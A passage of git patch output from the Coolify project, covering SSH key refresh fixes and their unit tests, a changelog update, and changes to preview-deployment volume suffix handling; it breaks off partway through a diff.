diff --git a/app/Models/Server.php b/app/Models/Server.php
index 508b9833b..527c744a5 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -135,7 +135,7 @@ protected static function booted()
             $server->forceFill($payload);
         });
         static::saved(function ($server) {
-            if ($server->privateKey?->isDirty()) {
+            if ($server->wasChanged('private_key_id') || $server->privateKey?->isDirty()) {
                 refresh_server_connection($server->privateKey);
             }
         });
diff --git a/tests/Unit/SshKeyValidationTest.php b/tests/Unit/SshKeyValidationTest.php
new file mode 100644
index 000000000..9a6c6c04b
--- /dev/null
+++ b/tests/Unit/SshKeyValidationTest.php
@@ -0,0 +1,133 @@
+<?php
+
+namespace Tests\Unit;
+
+use App\Helpers\SshMultiplexingHelper;
+use App\Models\PrivateKey;
+use Illuminate\Support\Facades\Storage;
+use Tests\TestCase;
+
+/**
+ * Tests for SSH key validation to prevent sporadic "Permission denied" errors.
+ *
+ * The root cause: validateSshKey() only checked file existence, not content.
+ * When a key was rotated in the DB but the old file persisted on disk,
+ * SSH would use the stale key and fail with "Permission denied (publickey)".
+ *
+ * @see https://github.com/coollabsio/coolify/issues/7724
+ */
+class SshKeyValidationTest extends TestCase
+{
+    public function test_validate_ssh_key_method_exists()
+    {
+        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
+        $this->assertTrue($reflection->isStatic(), 'validateSshKey should be a static method');
+    }
+
+    public function test_validate_ssh_key_accepts_private_key_parameter()
+    {
+        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
+        $parameters = $reflection->getParameters();
+
+        $this->assertCount(1, $parameters);
+        $this->assertEquals('privateKey', $parameters[0]->getName());
+
+        $type = $parameters[0]->getType();
+        $this->assertNotNull($type);
+        $this->assertEquals(PrivateKey::class, $type->getName());
+    }
+
+    public function test_store_in_file_system_sets_correct_permissions()
+    {
+        // Verify that storeInFileSystem enforces chmod 0600 via code inspection
+        $reflection = new \ReflectionMethod(PrivateKey::class, 'storeInFileSystem');
+        $this->assertTrue(
+            $reflection->isPublic(),
+            'storeInFileSystem should be public'
+        );
+
+        // Verify the method source contains chmod for 0600
+        $filename = $reflection->getFileName();
+        $startLine = $reflection->getStartLine();
+        $endLine = $reflection->getEndLine();
+        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
+
+        $this->assertStringContainsString('chmod', $source, 'storeInFileSystem should set file permissions');
+        $this->assertStringContainsString('0600', $source, 'storeInFileSystem should enforce 0600 permissions');
+    }
+
+    public function test_store_in_file_system_uses_file_locking()
+    {
+        // Verify the method uses flock to prevent race conditions
+        $reflection = new \ReflectionMethod(PrivateKey::class, 'storeInFileSystem');
+        $filename = $reflection->getFileName();
+        $startLine = $reflection->getStartLine();
+        $endLine = $reflection->getEndLine();
+        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
+
+        $this->assertStringContainsString('flock', $source, 'storeInFileSystem should use file locking');
+        $this->assertStringContainsString('LOCK_EX', $source, 'storeInFileSystem should use exclusive locks');
+    }
+
+    public function test_validate_ssh_key_checks_content_not_just_existence()
+    {
+        // Verify validateSshKey compares file content with DB value
+        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
+        $filename = $reflection->getFileName();
+        $startLine = $reflection->getStartLine();
+        $endLine = $reflection->getEndLine();
+        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
+
+        // Should read file content and compare, not just check existence with `ls`
+        $this->assertStringNotContainsString('ls $keyLocation', $source, 'Should not use ls to check key existence');
+        $this->assertStringContainsString('private_key', $source, 'Should compare against DB key content');
+        $this->assertStringContainsString('refresh', $source, 'Should refresh key from database');
+    }
+
+    public function test_server_model_detects_private_key_id_changes()
+    {
+        // Verify the Server model's saved event checks for private_key_id changes
+        $reflection = new \ReflectionMethod(\App\Models\Server::class, 'booted');
+        $filename = $reflection->getFileName();
+        $startLine = $reflection->getStartLine();
+        $endLine = $reflection->getEndLine();
+        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
+
+        $this->assertStringContainsString(
+            'wasChanged',
+            $source,
+            'Server saved event should detect private_key_id changes via wasChanged()'
+        );
+        $this->assertStringContainsString(
+            'private_key_id',
+            $source,
+            'Server saved event should specifically check private_key_id'
+        );
+    }
+
+    public function test_private_key_saved_event_resyncs_on_key_change()
+    {
+        // Verify PrivateKey model resyncs file and mux on key content change
+        $reflection = new \ReflectionMethod(PrivateKey::class, 'booted');
+        $filename = $reflection->getFileName();
+        $startLine = $reflection->getStartLine();
+        $endLine = $reflection->getEndLine();
+        $source = implode('', array_slice(file($filename), $startLine - 1, $endLine - $startLine + 1));
+
+        $this->assertStringContainsString(
+            "wasChanged('private_key')",
+            $source,
+            'PrivateKey saved event should detect key content changes'
+        );
+        $this->assertStringContainsString(
+            'refresh_server_connection',
+            $source,
+            'PrivateKey saved event should invalidate mux connections'
+        );
+        $this->assertStringContainsString(
+            'storeInFileSystem',
+            $source,
+            'PrivateKey saved event should resync key file'
+        );
+    }
+}

From 769365713079bc12399751cd94d2fa1c88b456e3 Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Sun, 15 Mar 2026 17:04:45 +0000
Subject: [PATCH 067/213] docs: update changelog

---
 CHANGELOG.md | 242 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 242 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 026dec470..45cbd48d2 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1225,6 +1225,66 @@ ### 🚀 Features
 - *(service)* Disable maybe (#8167)
 - *(service)* Add sure
 - *(service)* Add sure (#8157)
+- *(docker)* Install PHP sockets extension in development environment
+- *(services)* Add Spacebot service with custom logo support (#8427)
+- Expose scheduled tasks to API
+- *(api)* Add OpenAPI for managing scheduled tasks for applications and services
+- *(api)* Add delete endpoints for scheduled tasks in applications and services
+- *(api)* Add update endpoints for scheduled tasks in applications and services
+- *(api)* Add scheduled tasks CRUD API with auth and validation (#8428)
+- *(monitoring)* Add scheduled job monitoring dashboard (#8433)
+- *(service)* Disable plane
+- *(service)* Disable plane (#8580)
+- *(service)* Disable pterodactyl panel and pterodactyl wings
+- *(service)* Disable pterodactyl panel and pterodactyl wings (#8512)
+- *(service)* Upgrade beszel and beszel-agent to v0.18
+- *(service)* Upgrade beszel and beszel-agent to v0.18 (#8513)
+- Add command healthcheck type
+- Require health check command for 'cmd' type with backend validation and frontend update
+- *(healthchecks)* Add command health checks with input validation
+- *(healthcheck)* Add command-based health check support (#8612)
+- *(jobs)* Optimize async job dispatches and enhance Stripe subscription sync
+- *(jobs)* Add queue delay resilience to scheduled job execution
+- *(scheduler)* Add pagination to skipped jobs and filter manager start events
+- Add comment field to environment variables
+- Limit comment field to 256 characters for environment variables
+- Enhance environment variable handling to support mixed formats and add comprehensive tests
+- Add comment field to shared environment variables
+- Show comment field for locked environment variables
+- Add function to extract inline comments from docker-compose YAML environment variables
+- Add magic variable detection and update UI behavior accordingly
+- Add comprehensive environment variable parsing with nested resolution and hardcoded variable detection
+- *(models)* Add is_required to EnvironmentVariable fillable array
+- Add comment field to environment variables (#7269)
+- *(service)* Pydio-cells.yml
+- Pydio cells svg
+- Pydio-cells.yml pin to stable version
+- *(service)* Add Pydio cells (#8323)
+- *(service)* Disable minio community edition
+- *(service)* Disable minio community edition (#8686)
+- *(subscription)* Add Stripe server limit quantity adjustment flow
+- *(subscription)* Add refunds and cancellation management (#8637)
+- Add configurable timeout for public database TCP proxy
+- Add configurable proxy timeout for public database TCP proxy (#8673)
+- *(jobs)* Implement encrypted queue jobs
+- *(proxy)* Add database-backed config storage with disk backups
+- *(proxy)* Add database-backed config storage with disk backups (#8905)
+- *(livewire)* Add selectedActions parameter and error handling to delete methods
+- *(gitlab)* Add GitLab source integration with SSH and HTTP basic auth
+- *(git-sources)* Add GitLab integration and URL encode credentials (#8910)
+- *(server)* Add server metadata collection and display
+- *(git-import)* Support custom ssh command for fetch, submodule, and lfs
+- *(ui)* Add log filter based on log level
+- *(ui)* Add log filter based on log level (#8784)
+- *(seeders)* Add GitHub deploy key example application
+- *(service)* Update n8n-with-postgres-and-worker to 2.10.4 (#8807)
+- *(service)* Add container label escape control to services API
+- *(server)* Allow force deletion of servers with resources
+- *(server)* Allow force deletion of servers with resources (#8962)
+- *(compose-preview)* Populate fqdn from docker_compose_domains
+- *(compose-preview)* Populate fqdn from docker_compose_domains (#8963)
+- *(server)* Auto-fetch server metadata after validation
+- *(server)* Auto-fetch server metadata after validation (#8964)
 
 ### 🐛 Bug Fixes
 
@@ -4517,6 +4577,110 @@ ### 🐛 Bug Fixes
 - *(server)* Improve IP uniqueness validation with team-specific error messages
 - *(service)* Glitchtip webdashboard doesn't load
 - *(service)* Glitchtip webdashboard doesn't load (#8249)
+- *(api)* Improve scheduled tasks API with auth, validation, and execution endpoints
+- *(api)* Improve scheduled tasks validation and delete logic
+- *(security)* Harden deployment paths and deploy abilities (#8549)
+- *(service)* Always enable force https labels
+- *(traefik)* Respect force https in service labels (#8550)
+- *(team)* Include webhook notifications in enabled check (#8557)
+- *(service)* Resolve team lookup via service relationship
+- *(service)* Resolve team lookup via service relationship (#8559)
+- *(database)* Chown redis/keydb configs when custom conf set (#8561)
+- *(version)* Update coolify version to 4.0.0-beta.464 and nightly version to 4.0.0-beta.465
+- *(applications)* Treat zero private_key_id as deploy key (#8563)
+- *(deploy)* Split BuildKit and secrets detection (#8565)
+- *(auth)* Prevent CSRF redirect loop during 2FA challenge (#8596)
+- *(input)* Prevent eye icon flash on password fields before Alpine.js loads (#8599)
+- *(api)* Correct permission requirements for POST endpoints (#8600)
+- *(health-checks)* Prevent command injection in health check commands (#8611)
+- *(auth)* Prevent cross-tenant IDOR in resource cloning (#8613)
+- *(docker)* Centralize command escaping in executeInDocker helper (#8615)
+- *(api)* Add team authorization to domains_by_server endpoint (#8616)
+- *(ca-cert)* Prevent command injection via base64 encoding (#8617)
+- *(scheduler)* Add self-healing for stale Redis locks and detection in UI (#8618)
+- *(health-checks)* Sanitize and validate CMD healthcheck commands
+- *(healthchecks)* Remove redundant newline sanitization from CMD healthcheck
+- *(soketi)* Make host binding configurable for IPv6 support (#8619)
+- *(ssh)* Automatically fix SSH directory permissions during upgrade (#8635)
+- *(jobs)* Prevent non-due jobs firing on restart and enrich skip logs with resource links
+- *(database)* Close confirmation modal after import/restore
+- Application rollback uses correct commit sha
+- *(rollback)* Escape commit SHA to prevent shell injection
+- Save comment field when creating application environment variables
+- Allow editing comments on locked environment variables
+- Add Update button for locked environment variable comments
+- Remove duplicate delete button from locked environment variable view
+- Position Update button next to comment field for locked variables
+- Preserve existing comments in bulk update and always show save notification
+- Update success message logic to only show when changes are made
+- *(bootstrap)* Add bounds check to extractBalancedBraceContent
+- Pydio-cells svg path typo
+- *(database)* Handle PDO constant name change for PGSQL_ATTR_DISABLE_PREPARES
+- *(proxy)* Handle IPv6 CIDR notation in Docker network gateways (#8703)
+- *(ssh)* Prevent RCE via SSH command injection (#8748)
+- *(service)* Cloudreve doesn't persist data across restarts
+- *(service)* Cloudreve doesn't persist data across restarts (#8740)
+- Join link should be set correctly in the env variables
+- *(service)* Ente photos join link doesn't work (#8727)
+- *(subscription)* Harden quantity updates and proxy trust behavior
+- *(auth)* Resolve 419 session errors with domain-based access and Cloudflare Tunnels (#8749)
+- *(server)* Handle limit edge case and IPv6 allowlist dedupe
+- *(server-limit)* Re-enable force-disabled servers at limit
+- *(ip-allowlist)* Add IPv6 CIDR support for API access restrictions (#8750)
+- *(proxy)* Remove ipv6 cidr network remediation
+- Address review feedback on proxy timeout
+- *(proxy)* Add validation and normalization for database proxy timeout
+- *(proxy)* Mounting error for nginx.conf in dev
+- Enable preview deployment page for deploy key applications
+- *(application-source)* Support localhost key with id=0
+- Enable preview deployment page for deploy key applications (#8579)
+- *(docker-compose)* Respect preserveRepository setting when executing start command (#8848)
+- *(proxy)* Mounting error for nginx.conf in dev (#8662)
+- *(database)* Close confirmation modal after database import/restore (#8697)
+- *(subscription)* Use optional chaining for preview object access
+- *(parser)* Use firstOrCreate instead of updateOrCreate for environment variables
+- *(env-parser)* Capture clean variable names without trailing braces in bash-style defaults (#8855)
+- *(terminal)* Resolve WebSocket connection and host authorization issues (#8862)
+- *(docker-cleanup)* Respect keep for rollback setting for Nixpacks build images (#8859)
+- *(push-server)* Track last_online_at and reset database restart state
+- *(docker)* Prevent false container exits on failed docker queries (#8860)
+- *(api)* Require write permission for validation endpoints
+- *(sentinel)* Add token validation to prevent command injection
+- *(log-drain)* Prevent command injection by base64-encoding environment variables
+- *(git-ref-validation)* Prevent command injection via git references
+- *(docker)* Add path validation to prevent command injection in file locations
+- Prevent command injection and fix developer view shared variables error (#8889)
+- Build-time environment variables break Next.js (#8890)
+- *(modal)* Make confirmation modal close after dispatching Livewire actions (#8892)
+- *(parser)* Preserve user-saved env vars on Docker Compose redeploy (#8894)
+- *(security)* Sanitize newlines in health check commands to prevent RCE (#8898)
+- Prevent scheduled task input fields from losing focus
+- Prevent scheduled task input fields from losing focus (#8654)
+- *(api)* Add docker_cleanup parameter to stop endpoints
+- *(api)* Add docker_cleanup parameter to stop endpoints (#8899)
+- *(deployment)* Filter null and empty environment variables from nixpacks plan
+- *(deployment)* Filter null and empty environment variables from nixpacks plan (#8902)
+- *(livewire)* Add error handling and selectedActions to delete methods (#8909)
+- *(parsers)* Use firstOrCreate instead of updateOrCreate for environment variables
+- *(parsers)* Use firstOrCreate instead of updateOrCreate for environment variables (#8915)
+- *(ssh)* Remove undefined trackSshRetryEvent() method call (#8927)
+- *(validation)* Support scoped packages in file path validation (#8928)
+- *(parsers)* Resolve shared variables in compose environment
+- *(parsers)* Resolve shared variables in compose environment (#8930)
+- *(api)* Cast teamId to int in deployment authorization check
+- *(api)* Cast teamId to int in deployment authorization check (#8931)
+- *(git-import)* Ensure ssh key is used for fetch, submodule, and lfs operations (#8933)
+- *(ui)* Info logs were not highlighted with blue color
+- *(application)* Clarify deployment type precedence logic
+- *(git-import)* Explicitly specify ssh key and remove duplicate validation rules
+- *(application)* Clarify deployment type precedence logic (#8934)
+- *(git)* GitHub App webhook endpoint defaults to IPv4 instead of the instance domain
+- *(git)* GitHub App webhook endpoint defaults to IPv4 instead of the instance domain (#8948)
+- *(service)* Hoppscotch fails to start due to db unhealthy
+- *(service)* Hoppscotch fails to start due to db unhealthy (#8949)
+- *(api)* Allow is_container_label_escape_enabled in service operations (#8955)
+- *(docker-compose)* Respect preserveRepository when injecting --project-directory
+- *(docker-compose)* Respect preserveRepository when injecting --project-directory (#8956)
 
 ### 💼 Other
 
@@ -4982,6 +5146,11 @@ ### 💼 Other
 - Bump superset to 6.0.0
 - Trim whitespace from domain input in instance settings (#7837)
 - Upgrade postgres client to fix build error
+- Application rollback uses correct commit sha (#8576)
+- *(deps)* Bump rollup from 4.57.1 to 4.59.0
+- *(deps)* Bump rollup from 4.57.1 to 4.59.0 (#8691)
+- *(deps)* Bump league/commonmark from 2.8.0 to 2.8.1
+- *(deps)* Bump league/commonmark from 2.8.0 to 2.8.1 (#8793)
 
 ### 🚜 Refactor
 
@@ -5610,6 +5779,12 @@ ### 🚜 Refactor
 - *(services)* Improve some service slogans
 - *(ssh-retry)* Remove Sentry tracking from retry logic
 - *(ssh-retry)* Remove Sentry tracking from retry logic
+- *(jobs)* Split task skip checks into critical and runtime phases
+- Add explicit fillable array to EnvironmentVariable model
+- Replace inline note with callout component for consistency
+- *(application-source)* Use Laravel helpers for null checks
+- *(ssh)* Remove Sentry retry event tracking from ExecuteRemoteCommand
+- Consolidate file path validation patterns and support scoped packages
 
 ### 📚 Documentation
 
@@ -5756,6 +5931,12 @@ ### 📚 Documentation
 - Add Coolify design system reference (#8237)
 - Update changelog
 - Update changelog
+- Update changelog
+- *(sponsors)* Add huge sponsors section and reorganize list
+- *(application)* Add comments explaining commit selection logic for rollback support
+- *(readme)* Add VPSDime to Big Sponsors list
+- *(readme)* Move MVPS to Huge Sponsors section
+- *(settings)* Clarify Do Not Track helper text
 
 ### ⚡ Performance
 
@@ -5797,6 +5978,10 @@ ### 🧪 Testing
 - Add Pest browser testing with SQLite :memory: schema
 - Add dashboard test and improve browser test coverage
 - Migrate to SQLite :memory: and add Pest browser testing (#8364)
+- *(rollback)* Use full-length git commit SHA values in test fixtures
+- *(rollback)* Verify shell metacharacter escaping in git commit parameter
+- *(factories)* Add missing model factories for app test suite
+- *(magic-variables)* Add feature tests for SERVICE_URL/FQDN variable handling
 
 ### ⚙️ Miscellaneous Tasks
 
@@ -6533,6 +6718,63 @@ ### ⚙️ Miscellaneous Tasks
 - Prepare for PR
 - Prepare for PR
 - Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- *(scheduler)* Fix scheduled job duration metric (#8551)
+- Prepare for PR
+- Prepare for PR
+- *(horizon)* Make max time configurable (#8560)
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- *(ui)* Widen project heading nav spacing (#8564)
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Add pr quality check workflow
+- Do not build or generate changelog on pr-quality changes
+- Add pr quality check via anti slop action (#8344)
+- Improve pr quality workflow
+- Delete label removal workflow
+- Improve pr quality workflow (#8374)
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- *(repo)* Improve contributor PR template
+- Add anti-slop v0.2 options to the pr-quality check
+- Improve pr template and quality check workflow (#8574)
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- *(ui)* Add labels header
+- *(ui)* Add container labels header (#8752)
+- *(templates)* Update n8n templates to 2.10.2 (#8679)
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- *(version)* Bump coolify, realtime, and sentinel versions
+- *(realtime)* Upgrade npm dependencies
+- *(realtime)* Upgrade coolify-realtime to 1.0.11
+- Prepare for PR
+- Prepare for PR
+- Prepare for PR
+- *(release)* Bump version to 4.0.0-beta.466
+- Prepare for PR
+- Prepare for PR
+- *(service)* Pin castopod service to a static version instead of latest
 
 ### ◀️ Revert
 

From 2f96a759dfc92e02eb7a17c89929e33f13e14de7 Mon Sep 17 00:00:00 2001
From: pannous <info@pannous.com>
Date: Mon, 16 Mar 2026 10:40:22 +0100
Subject: [PATCH 068/213] test: add behavioral ssh key stale-file regression

---
 tests/Unit/SshKeyValidationTest.php | 56 +++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)

diff --git a/tests/Unit/SshKeyValidationTest.php b/tests/Unit/SshKeyValidationTest.php
index 9a6c6c04b..fbcf7725d 100644
--- a/tests/Unit/SshKeyValidationTest.php
+++ b/tests/Unit/SshKeyValidationTest.php
@@ -4,7 +4,9 @@
 
 use App\Helpers\SshMultiplexingHelper;
 use App\Models\PrivateKey;
+use Illuminate\Support\Facades\File;
 use Illuminate\Support\Facades\Storage;
+use Illuminate\Support\Str;
 use Tests\TestCase;
 
 /**
@@ -130,4 +132,58 @@ public function test_private_key_saved_event_resyncs_on_key_change()
             'PrivateKey saved event should resync key file'
         );
     }
+
+    public function test_validate_ssh_key_rewrites_stale_file_and_fixes_permissions()
+    {
+        $diskRoot = sys_get_temp_dir().'/coolify-ssh-test-'.Str::uuid();
+        File::ensureDirectoryExists($diskRoot);
+        config(['filesystems.disks.ssh-keys.root' => $diskRoot]);
+        app('filesystem')->forgetDisk('ssh-keys');
+
+        $privateKey = new class extends PrivateKey
+        {
+            public int $storeCallCount = 0;
+
+            public function refresh()
+            {
+                return $this;
+            }
+
+            public function getKeyLocation()
+            {
+                return Storage::disk('ssh-keys')->path("ssh_key@{$this->uuid}");
+            }
+
+            public function storeInFileSystem()
+            {
+                $this->storeCallCount++;
+                $filename = "ssh_key@{$this->uuid}";
+                $disk = Storage::disk('ssh-keys');
+                $disk->put($filename, $this->private_key);
+                $keyLocation = $disk->path($filename);
+                chmod($keyLocation, 0600);
+
+                return $keyLocation;
+            }
+        };
+
+        $privateKey->uuid = (string) Str::uuid();
+        $privateKey->private_key = 'NEW_PRIVATE_KEY_CONTENT';
+
+        $filename = "ssh_key@{$privateKey->uuid}";
+        $disk = Storage::disk('ssh-keys');
+        $disk->put($filename, 'OLD_PRIVATE_KEY_CONTENT');
+        $staleKeyPath = $disk->path($filename);
+        chmod($staleKeyPath, 0644);
+
+        $reflection = new \ReflectionMethod(SshMultiplexingHelper::class, 'validateSshKey');
+        $reflection->setAccessible(true);
+        $reflection->invoke(null, $privateKey);
+
+        $this->assertSame('NEW_PRIVATE_KEY_CONTENT', $disk->get($filename));
+        $this->assertSame(1, $privateKey->storeCallCount);
+        $this->assertSame(0600, fileperms($staleKeyPath) & 0777);
+
+        File::deleteDirectory($diskRoot);
+    }
 }

From 5b424f1f0e44a0783406d4652e7a410c8ae309bc Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 13:33:58 +0100
Subject: [PATCH 069/213] fix(preview): exclude bind mounts from preview
 deployment suffix

Bind mount volumes reference files at the repository's original path and
should not receive the -pr-N suffix. Only named Docker volumes require
the suffix for isolation between preview deployments.

Adds PreviewDeploymentBindMountTest to verify the correct behavior.

Fixes #7802
---
 bootstrap/helpers/parsers.php                 |  3 --
 coolify-examples-1                            |  1 +
 tests/Unit/PreviewDeploymentBindMountTest.php | 41 +++++++++++++++++++
 3 files changed, 42 insertions(+), 3 deletions(-)
 create mode 160000 coolify-examples-1
 create mode 100644 tests/Unit/PreviewDeploymentBindMountTest.php

diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index e84df55f9..95f5fa9c0 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -789,9 +789,6 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                             $mainDirectory = str(base_configuration_dir().'/applications/'.$uuid);
                         }
                         $source = replaceLocalSource($source, $mainDirectory);
-                        if ($isPullRequest) {
-                            $source = addPreviewDeploymentSuffix($source, $pull_request_id);
-                        }
                         LocalFileVolume::updateOrCreate(
                             [
                                 'mount_path' => $target,
diff --git a/coolify-examples-1 b/coolify-examples-1
new file mode 160000
index 000000000..a5964d89a
--- /dev/null
+++ b/coolify-examples-1
@@ -0,0 +1 @@
+Subproject commit a5964d89a9d361dea373ddabaec265916266c4fc
diff --git a/tests/Unit/PreviewDeploymentBindMountTest.php b/tests/Unit/PreviewDeploymentBindMountTest.php
new file mode 100644
index 000000000..acc560e68
--- /dev/null
+++ b/tests/Unit/PreviewDeploymentBindMountTest.php
@@ -0,0 +1,41 @@
+<?php
+
+/**
+ * Tests for GitHub issue #7802: volume mappings from repo content in Preview Deployments.
+ *
+ * Bind mount volumes (e.g., ./scripts:/scripts:ro) should NOT get a -pr-N suffix
+ * during preview deployments, because the repo files exist at the original path.
+ * Only named Docker volumes need the suffix for isolation between PRs.
+ */
+it('does not apply preview deployment suffix to bind mount source paths', function () {
+    // Read the applicationParser volume handling in parsers.php
+    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+
+    // Find the bind mount handling block (type === 'bind')
+    $bindBlockStart = strpos($parsersFile, "if (\$type->value() === 'bind')");
+    $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
+    $bindBlock = substr($parsersFile, $bindBlockStart, $volumeBlockStart - $bindBlockStart);
+
+    // Bind mount paths should NOT be suffixed with -pr-N
+    expect($bindBlock)->not->toContain('addPreviewDeploymentSuffix');
+});
+
+it('still applies preview deployment suffix to named volume paths', function () {
+    // Read the applicationParser volume handling in parsers.php
+    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+
+    // Find the named volume handling block (type === 'volume')
+    $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
+    $volumeBlock = substr($parsersFile, $volumeBlockStart, 1000);
+
+    // Named volumes SHOULD still get the -pr-N suffix for isolation
+    expect($volumeBlock)->toContain('addPreviewDeploymentSuffix');
+});
+
+it('confirms addPreviewDeploymentSuffix works correctly', function () {
+    $result = addPreviewDeploymentSuffix('myvolume', 3);
+    expect($result)->toBe('myvolume-pr-3');
+
+    $result = addPreviewDeploymentSuffix('myvolume', 0);
+    expect($result)->toBe('myvolume');
+});

From 1b484a56b0698993335bdcd92cfe186e72246701 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 13:37:14 +0100
Subject: [PATCH 070/213] chore: remove coolify-examples-1 submodule

---
 coolify-examples-1 | 1 -
 1 file changed, 1 deletion(-)
 delete mode 160000 coolify-examples-1

diff --git a/coolify-examples-1 b/coolify-examples-1
deleted file mode 160000
index a5964d89a..000000000
--- a/coolify-examples-1
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit a5964d89a9d361dea373ddabaec265916266c4fc

From add16853a8180896864769c8904e72a0777383b8 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 14:54:22 +0100
Subject: [PATCH 071/213] feat(preview): add configurable PR suffix toggle for
 volumes

Add `is_preview_suffix_enabled` flag to `local_file_volumes` and
`local_persistent_volumes` tables, allowing per-volume control over
whether a `-pr-N` suffix is appended during preview deployments.

Defaults to `true` to preserve existing behavior. Users can disable
it for volumes containing shared config or repository scripts that
should not be isolated per PR.
---
 app/Jobs/ApplicationDeploymentJob.php         |  6 +-
 app/Livewire/Project/Service/FileStorage.php  |  6 ++
 app/Livewire/Project/Shared/Storages/Show.php | 14 ++++
 app/Models/LocalFileVolume.php                |  1 +
 app/Models/LocalPersistentVolume.php          |  4 +
 bootstrap/helpers/parsers.php                 | 26 +++---
 ...review_suffix_enabled_to_volume_tables.php | 30 +++++++
 .../project/service/file-storage.blade.php    |  7 ++
 .../project/shared/storages/show.blade.php    | 14 ++++
 tests/Unit/PreviewDeploymentBindMountTest.php | 84 +++++++++++++++++--
 10 files changed, 172 insertions(+), 20 deletions(-)
 create mode 100644 database/migrations/2026_03_16_000000_add_is_preview_suffix_enabled_to_volume_tables.php

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index f84cdceb9..a0cc7aaa0 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2745,7 +2745,8 @@ private function generate_local_persistent_volumes()
             } else {
                 $volume_name = $persistentStorage->name;
             }
-            if ($this->pull_request_id !== 0) {
+            $isPreviewSuffixEnabled = (bool) data_get($persistentStorage, 'is_preview_suffix_enabled', true);
+            if ($this->pull_request_id !== 0 && $isPreviewSuffixEnabled) {
                 $volume_name = addPreviewDeploymentSuffix($volume_name, $this->pull_request_id);
             }
             $local_persistent_volumes[] = $volume_name.':'.$persistentStorage->mount_path;
@@ -2763,7 +2764,8 @@ private function generate_local_persistent_volumes_only_volume_names()
             }
             $name = $persistentStorage->name;
 
-            if ($this->pull_request_id !== 0) {
+            $isPreviewSuffixEnabled = (bool) data_get($persistentStorage, 'is_preview_suffix_enabled', true);
+            if ($this->pull_request_id !== 0 && $isPreviewSuffixEnabled) {
                 $name = addPreviewDeploymentSuffix($name, $this->pull_request_id);
             }
 
diff --git a/app/Livewire/Project/Service/FileStorage.php b/app/Livewire/Project/Service/FileStorage.php
index 5d948bffd..33b32989a 100644
--- a/app/Livewire/Project/Service/FileStorage.php
+++ b/app/Livewire/Project/Service/FileStorage.php
@@ -40,12 +40,16 @@ class FileStorage extends Component
     #[Validate(['required', 'boolean'])]
     public bool $isBasedOnGit = false;
 
+    #[Validate(['required', 'boolean'])]
+    public bool $isPreviewSuffixEnabled = true;
+
     protected $rules = [
         'fileStorage.is_directory' => 'required',
         'fileStorage.fs_path' => 'required',
         'fileStorage.mount_path' => 'required',
         'content' => 'nullable',
         'isBasedOnGit' => 'required|boolean',
+        'isPreviewSuffixEnabled' => 'required|boolean',
     ];
 
     public function mount()
@@ -71,12 +75,14 @@ public function syncData(bool $toModel = false): void
             // Sync to model
             $this->fileStorage->content = $this->content;
             $this->fileStorage->is_based_on_git = $this->isBasedOnGit;
+            $this->fileStorage->is_preview_suffix_enabled = $this->isPreviewSuffixEnabled;
 
             $this->fileStorage->save();
         } else {
             // Sync from model
             $this->content = $this->fileStorage->content;
             $this->isBasedOnGit = $this->fileStorage->is_based_on_git;
+            $this->isPreviewSuffixEnabled = $this->fileStorage->is_preview_suffix_enabled ?? true;
         }
     }
 
diff --git a/app/Livewire/Project/Shared/Storages/Show.php b/app/Livewire/Project/Shared/Storages/Show.php
index 69395a591..72b330845 100644
--- a/app/Livewire/Project/Shared/Storages/Show.php
+++ b/app/Livewire/Project/Shared/Storages/Show.php
@@ -29,10 +29,13 @@ class Show extends Component
 
     public ?string $hostPath = null;
 
+    public bool $isPreviewSuffixEnabled = true;
+
     protected $rules = [
         'name' => 'required|string',
         'mountPath' => 'required|string',
         'hostPath' => 'string|nullable',
+        'isPreviewSuffixEnabled' => 'required|boolean',
     ];
 
     protected $validationAttributes = [
@@ -53,11 +56,13 @@ private function syncData(bool $toModel = false): void
             $this->storage->name = $this->name;
             $this->storage->mount_path = $this->mountPath;
             $this->storage->host_path = $this->hostPath;
+            $this->storage->is_preview_suffix_enabled = $this->isPreviewSuffixEnabled;
         } else {
